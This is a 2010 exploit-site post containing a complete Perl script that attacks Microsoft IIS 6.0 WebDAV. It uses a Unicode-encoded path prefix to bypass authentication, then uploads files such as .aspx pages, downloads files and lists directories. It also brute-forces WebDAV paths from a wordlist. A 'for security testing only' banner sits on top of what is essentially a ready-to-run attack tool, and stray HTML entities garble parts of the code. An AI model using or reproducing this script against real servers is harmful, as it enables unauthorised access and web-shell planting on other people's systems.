[remote exploits] - MS IIS 6.0 WebDAV Auth. Bypass Exploit
Posted on 24 September 2010
====================================== MS IIS 6.0 WebDAV Auth. Bypass Exploit ====================================== # Author : FoX HaCkEr #Contact : MKQ@HoTmAiL.CoM # SiTe : www.sec4ever.com ====================================================================================================== #!/usr/bin/perl # ********* !!! WARNING !!! ********* # * FOR SECURITY TESTiNG ONLY! * # *********************************** # MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 # v1.1 add brute force dir fuction. # v1.0 download?upload and list dir. 
# # Usage: # IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file] # -target &nbs p; eg.: 192.168.1.1 # -port eg.: 80 # -method eg.: g # (p:PUT,g:GET,l:LIST) # -webdavpath eg.: webdav # -BruteForcePath eg.: brute force webdav path # -file (optional) eg.: test.aspx # Example: # put a file: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx # get a file: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx # list dir: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav # brute force + list dir: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt # brute force + get file: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx use IO::Socket;use Getopt::Long; use threads; use threads::shared; # Globals Go Here. my $target; # Host being probed. my $port; # Webserver port. my $method; # HTTP Method, PUT GET or . my $xpath; # WebDAV path on Webserver. my $bpath; # Bruteforce WebDAV path. my $file; # file name. my $httpmethod; my $Host_Header; # The Host header has to be changed GetOptions( "target=s" ; => $target, "port=i" => $port, "method=s" => $method, "xpath=s" => $xpath, "bpath=s" => $bpath, "file=s" => $file, "help|?" => sub { hello(); exit(0); } ); $error .= "Error: You must specify a target host " if ((!$target)); $error .= "Error: You must specify a target port " if ((!$port)); $error .= "Error: You must specify a put,get or list method " if ((!$method)); $error .= "Error: You must specify a webdav path " if ((!$xpath) && (!$bpath)); $error .= "Error: You must specify a upload or download file name " if ((!$file) && $method != "l"); if ($error) { print "Try $0 -help or -?' for more information. $error " ; exit; } hello(); if ($method eq "p") { $httpmethod = "PUT"; } elsif ($method eq "g") { $httpmethod = "GET"; } elsif ($method eq "l") { $httpmethod = "PROPFIND"; } else { print "$method Method not accept !!! 
"; exit(0); } # ************************************ # * We testing WebDAV methods first * # ************************************ webdavtest($target,$port); #end of WebDAV testing. # **************************************** # * We try to brute forceing WebDAV path * # **************************************** if ($bpath) { $xpath = webdavbf($target,$port,$bpath); } #end of brute force print "-" x 60 ." "; if ($httpmethod eq "PUT") { my $content; my $data; #cacl file size $filesize = -s $file; print "$file size is $filesize bytes "; open(INFO, $file) || die("Could not open file!"); #@lines=<INFO>; binmode(INFO); #binary while( read(INFO, $data, $filesize)) { $content .= $data; } close(INFO); #print $content; $Host_Header = "Translate: f Host: $target Content-Length: $filesize "; } elsif ($httpmethod eq "GET") { $Host_Header = "Translate: f Host: $target Connection: close "; } elsif ($httpmethod eq "PROPFIND") { $Host_Header = "Host: $target Connection: close Content-Type: text/xml; charset="utf-8" Content-Length: 0 "; $Host_Header = $Host_Header."<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://apache.org/dav/props/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>"; } print "-" x 60 ." $httpmethod $file , Please wait ... "."-" x 60 ." 
"; # ******************** **** # * Sending HTTP request * # ************************ if ($httpmethod eq "PUT") { @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0 $Host_Header $content",$target,$port,10); if ($#results < 1){die "10s timeout to $target on port $port ";} } elsif ($httpmethod eq "GET") { @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0 $Host_Header",$target,$port,10); if ($#results < 1){die "10s timeout to $target on port $port ";} } elsif ($httpmethod eq "PROPFIND") { @results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0 $Host_Header",$target,$port,10); if ($#results < 1){die "10s timeout to $target on port $port ";} } #print @results; $flag="off"; if ($results[0] =~ m|^HTTP/1.[01] 2[0-9][0-9] |){ $flag="on"; } elsif ($results[0] =~ m|^HTTP/1.[01] 4[0-9][0-9] |){ $flag="off"; }&nb sp; print "-" x 60 ." "; if ($flag eq "on") { if ($httpmethod eq "PUT") { print "$httpmethod $file from [$target:$port/$xpath] OK "; } elsif ($httpmethod eq "GET") { my $line_no = 0; my $counter = @results; foreach $line (@results){ ++$line_no; if ($line =~ /^Accept-Ranges: bytes /){ last; } } # Write file to disk open(OUTFILE, ">$file") or die "Could not write to file: $! "; binmode (OUTFILE); print OUTFILE @results[$line_no+1..$counter]; close(OUTFILE); print "$httpmethod $file from [$target:$port/$xpath] OK Please check $file on local disk "; } elsif ($httpmethod eq "PROPFIND") { print "$httpmethod path list from [$target:$port/$xpath] OK "; foreach $line (@results){ if ($line =~ /^<?xml version=/i){ my @list = split("<a:href>", $line); foreach $path (@list) { $no = index($path,"<"); $result.=substr($path, 0, $no)." "; } print $result; ; last; } } } } else { print "$httpmethod $file from [$target:$port/$xpath] FAILED!!! "; } print "-" x 60 ." 
"; exit(0); # ************* # * Sendraw-2 * # ************* sub sendraw2 { my ($pstr,$realip,$realport,$timeout)=@_; my $target2 = inet_aton($realip); my $flagexit=0; $SIG{ALRM}=&ermm; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems"); alarm($timeout); if (connect(S,pack "SnA4x8",2,$realport,$target2)){ alarm(0); my @in; select(S); $|=1; print $pstr; alarm($timeout); while(<S>){ if ($flagexit == 1){ close (S); print STDOUT "Timeout "; return "Timeout"; } push @in, $_; } alarm(0); select(STDOUT); close(S); return @in; } else {return "0";} } sub ermm{ $flagexit=1; close (S); } sub webdavtest { my ($testip,$testport)=@_; print "-" x 60 ." "; print "Testing WebDAV methods [$testip $testport] "; print "-" x 60 ." "; @results=sendraw2("OPTIONS / HTTP/1.0 ",$testip,$testport,10); if ($#results < 1){die "10s timeout to $target on port $testport ";} #print @results; $flag="off"; foreach $line (@results){ if ($line =~ /^Server: /){ ($left,$right)=split(/:/,$line); $right =~ s/ //g; print "$target : Server type is : $right"; if ($right !~ /Microsoft-IIS/i){ print "$target : Not a Microsoft IIS Server "; exit(0); } } if ($line =~ /^DAV: /){ $flag="on"; } if ($line =~ /^Public: / && $flag eq "on"){ ($left,$right)=split(/:/,$line); &n bsp; $right =~ s/ //g; print "$target : Method type is : $right"; if ($right !~ /$httpmethod/i){ print "$target : Not allow $httpmethod on this WebDAV Server "; exit(0); } else { $flag="on"; } } } if ($flag eq "off") { print "$target : WebDAV disable "; exit(0); } } sub webdavbf { my ($bfip,$bfport,$bfpath)=@_; print "-" x 60 ." "; print "Try to brute forceing WebDAV path ... "; print "-" x 60 ." 
"; & nbsp; open(BF, $bfpath) || die("Could not open file!"); foreach $lines (<BF>){ chomp($lines); $Host_Header = "Host: $bfip Connection: close Content-Type: text/xml; charset="utf-8" Content-Length: 0 "; $Host_Header = $Host_Header."<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://apache.org/dav/props/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>"; @results=sendraw2("PROPFIND /$lines/ HTTP/1.0 $Host_Header",$bfip,$bfport,10); if ($#results < 1){die "10s timeout to $bfip on port $bfport ";} print "[$lines]...$results[0]"; #maybe this response< br> #HTTP/1.1 207 Multi-Status if ($results[0] =~ m|^HTTP/1.[01] 401 |){ print "Find out path on [$lines] "; return $lines; last; } } close(BF) ; print "Sorry... We can not find any more path... :( "; exit(0); } sub hello{ print " "; print " ################################################## "; print " # MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0 # "; print " # **************** !!! WARNING !!! **************# "; print " # **** FOR PRIV8 AND EDUCATIONAL USE ONLY! ****# "; print " # ***********************************************# "; print " # Written by csgcsg 090529 ; # "; print " ################################################### "; print " $0 -target -port -method -webdavpath [-file] "; print " -target eg.: 192.168.1.1 "; print " -port eg.: 80 "; print " -method (p:PUT, g:GET, l:LIST) eg.: g "; print " -webdavpath|-bruteForcePath eg.: webdav "; print " -file eg.: test.aspx "; print " Usage eg.: $0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx "; }; ======================================================================================================= Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members p0c team & # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-24]</pre></body></html>